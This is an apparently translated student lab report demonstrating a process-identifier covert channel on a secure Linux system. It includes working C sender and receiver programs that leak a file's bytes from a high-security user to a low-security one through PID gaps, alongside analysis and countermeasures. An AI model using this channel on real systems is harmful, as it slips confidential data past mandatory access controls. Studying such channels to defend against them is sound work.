Ansune secure operating system covert channel demonstration scenario: the "Process Identifier Channel"

Source: Internet
Author: User

I. Purpose of the experiment

1. Become familiar with the operating environment of the Ansune secure operating system

2. Learn how to handle covert channels


II. Contents of the experiment

1. Finish writing, compiling and running the sending and receiving programs

2. Demonstrate the existence of the covert channel in this scenario.


III. Experimental process and results
(1) Experiment preparation

1. Before handling the covert channel, boot into the secure kernel seclinux.

2. Create two users, user_h and user_l, and assign their security categories so that user_h's category includes user_l's and user_h's security level is higher than user_l's. In addition, set the security level of each user's home directory equal to that user's security level, and set the discretionary access control permissions of both home directories with the chmod command to 0777, so that u, g and o may all read, write and execute.

3. Check the security of seclinux:

A high-level user can read low-security files but can neither create low-security files nor pass information downward by copying. A low-level user cannot read high-security files.

(2) Selected covert channel: the process identifier channel
Channel name:

Process identifier channel


Channel type:

Persistent variable type


Mediating variable:

last_pid


Conditions of existence:

All processes in the system share one process identifier list. Regardless of the security policy the system adopts, high-security and low-security processes both share this list, and any process can learn the currently available process identifier by creating a child process. If the system's process identifier table is quiet, that is, no other process is consuming process identifiers, then high and low processes can infer the activity of other processes from the growth of the process identifier.


Sender action:

The sender reads the confidential file and, based on the ASCII code of the current byte of its contents, decides how many child processes to create; after the receiver has read the information, the child processes are terminated.


Receiver action:

Create a child process to obtain the current process identifier, then compare it with the process identifier of the previously created child process to learn how many child processes other processes created in between, and interpret the information so obtained.


Noise situation:

High noise. Any other process in the system can create child processes, causing the receiver to misinterpret the information it obtains. If the transmission is rescheduled to a time when other users are not working (for example, 12 o'clock midnight), a larger bandwidth may be obtained.


Bandwidth estimation:

Up to 160 bits per second.


Countermeasures:

Randomize the allocation of process identifiers, or add an idle process that randomly creates child processes.


Tag variable:

cc_pid

(3) Synchronization mechanism

Synchronization is achieved with sleep (seconds) / usleep (microseconds).

While a process sleeps, it gives up the CPU to other processes until the sleep time has elapsed, after which it regains the CPU.

This synchronization technique is easy to implement and suitable for a demonstration.

However, because sending different characters takes different amounts of time while the sleep time is fixed and cannot be changed while the program is running, this form of synchronization inevitably wastes time.

(4) Experimental results

As shown in the figure, the left side is the sender cc_sender and the right side is the receiver cc_receiver. The sender obtains the data to send from the file sender_text.txt in the same directory and sends it over the covert channel to the receiver, which saves the data into the file receiver_text.txt in the same directory. The data stored in the sender-side file is ABCDEFG.

From the contents of receiver_text.txt it can be seen that the 7 characters ABCDEFG were transmitted correctly.




(5) Source code of the sender

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

void sendchar(char ch);

int main(void)
{
    int ch;      /* int, not char, so that EOF can be distinguished from a data byte */
    FILE *fp;
    if ((fp = fopen("./sender_text.txt", "r")) == NULL) {   /* open the file to be sent */
        printf("fopen error.\n");
        exit(0);
    }
    while ((ch = fgetc(fp)) != EOF) {
        sendchar((char)ch);   /* send one character every 2 seconds */
        sleep(2);
    }
    fclose(fp);
    return 0;
}

/* Character send function: create ch child processes to represent the
   character ch; each child lives for 2 seconds. */
void sendchar(char ch)
{
    pid_t fpid;   /* value returned by fork */
    int i;
    int count = (int)ch;
    printf("***************************************************\n");
    printf("Sending [%c], new pid count = [%d].\n", ch, count);
    for (i = 0; i < count; i++) {   /* the parent keeps creating child processes */
        fpid = fork();
        if (fpid < 0) {
            printf("fork error.\n");
        } else if (fpid == 0) {
            printf("Sending [%c], last_pid = %d.\n", ch, getpid());
            sleep(2);   /* the child exits after 2 seconds */
            exit(0);
        }
    }
}

(6) Source code of the receiver

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

int bstart = 0;   /* 0 until the first character has been received */

void writetofile(char ch);
char receivechar(void);

int main(void)
{
    char ch;
    remove("./receiver_text.txt");   /* delete the file received last time */
    /* receive one character every 2 seconds */
    while (((ch = receivechar()) != (char)0) || bstart == 0) {
        if (bstart == 0) {
            printf("not start.\n");   /* bstart == 0: the sender has not started sending */
        } else {
            printf("Write [%c] to file.\n", ch);   /* character received from the sender */
            writetofile(ch);   /* append ch to the receiving file */
        }
    }
    printf("end.\n");
    return 0;
}

/* Append ch to the receiving file. */
void writetofile(char ch)
{
    FILE *fp;
    if ((fp = fopen("./receiver_text.txt", "a")) == NULL) {
        printf("fopen error.\n");
        exit(0);
    }
    fputc(ch, fp);
    fclose(fp);
}

/* Receive one character: the PID difference across a 2-second gap encodes it. */
char receivechar(void)
{
    pid_t fpid1, fpid2;   /* values returned by the two fork calls */
    int idiff;
    char ch;
    printf("\n");
    printf("receiving round begins.\n");
    fpid1 = fork();
    if (fpid1 < 0) {
        printf("fork error.\n");
    } else if (fpid1 == 0) {
        exit(0);
    }
    sleep(2);
    fpid2 = fork();
    if (fpid2 < 0) {
        printf("fork error.\n");
    } else if (fpid2 == 0) {
        exit(0);
    }
    idiff = fpid2 - fpid1 - 1;   /* the first fork itself consumed one PID */
    ch = (char)idiff;
    if (idiff < 30) {
        /* other new processes may appear and be mistaken for the sender;
           a difference below 30 is treated as noise, not data */
        printf("receiving round ends. pid_diff = [%d], data is [%c]\n", idiff, ch);
        return (char)0;
    } else {
        if (bstart == 0) {   /* first reception: the sender process itself also took a PID */
            idiff--;
            ch--;
        }
        printf("receiving round ends. pid_diff = [%d], data is [%c]\n", idiff, ch);
        bstart = 1;   /* no longer the first reception */
        return ch;
    }
}
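To see why the countermeasure listed above (randomizing process identifier allocation) defeats this channel, here is an added simulation that is not part of the original report: it models the kernel's PID allocator in sequential and randomized modes and runs the sender/receiver protocol against each, decoding every round exactly as receivechar() does (probe2 - probe1 - 1). The PID range, the starting PID and the seed are constructed values.

```c
#include <stdint.h>
#define PID_MIN 300     /* constructed: first PID the model hands out */
#define PID_MAX 32768   /* constructed: size of the PID space in the model */

/* Simulated kernel PID allocator, sequential (what the channel relies on) or
   randomized (the countermeasure). last_pid is the page's mediating variable.
   Live-PID bookkeeping is omitted: every process in the model exits at once. */
typedef struct {
    int randomized;
    int last_pid;
    uint32_t rng;   /* deterministic LCG state, so runs are reproducible */
} pid_alloc_t;
static uint32_t lcg_next(uint32_t *s) {
    *s = *s * 1664525u + 1013904223u;
    return *s >> 16;   /* use the high bits; the low bits of an LCG cycle quickly */
}

void alloc_init(pid_alloc_t *a, int randomized, uint32_t seed) {
    a->randomized = randomized;
    a->last_pid = PID_MIN;
    a->rng = seed;
}

/* Hand out one PID. Sequential: last_pid + 1, wrapping at PID_MAX. Randomized: a
   uniform pick from the whole range, so the distance between two observed PIDs
   no longer reveals how many forks happened in between. */
int alloc_pid(pid_alloc_t *a) {
    if (a->randomized)
        a->last_pid = PID_MIN + (int)(lcg_next(&a->rng) % (PID_MAX - PID_MIN));
    else
        a->last_pid = (a->last_pid + 1 < PID_MAX) ? a->last_pid + 1 : PID_MIN;
    return a->last_pid;
}

/* One round of the page's protocol, decoded the way receivechar() does it. */
int channel_round(pid_alloc_t *a, unsigned char ch) {
    int probe1 = alloc_pid(a);                  /* receiver's first probe fork */
    for (int i = 0; i < ch; i++) alloc_pid(a);  /* sender forks ch child processes */
    int probe2 = alloc_pid(a);                  /* receiver's second probe fork */
    return probe2 - probe1 - 1;                 /* the first probe itself took a PID */
}

/* Number of the n rounds (each sending ch) that decode correctly under a policy. */
int correct_rounds(int randomized, unsigned char ch, int n) {
    pid_alloc_t a; int ok = 0;
    alloc_init(&a, randomized, 12345u);   /* constructed seed */
    for (int i = 0; i < n; i++) ok += (channel_round(&a, ch) == ch);
    return ok;
}
```

With sequential allocation every round decodes correctly; with randomized allocation the decoded value is essentially unrelated to the byte sent, which is the effect the countermeasure relies on.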

IV. Summary of the experiment
Experiment gains:

Learned a great deal about covert channels, and became more familiar with the use of Ansune operating system commands.


Problems encountered during the experiment and their solutions:

Developing C programs on Linux without an IDE makes programming very inconvenient.


Solution:

Share the C source code on Linux with Windows via Samba, so that it can be edited under Windows with a professional IDE such as Visual Studio, ensuring that coding is done efficiently. After coding is complete, use the Linux scp tool to transfer the files, as shown in the figure:



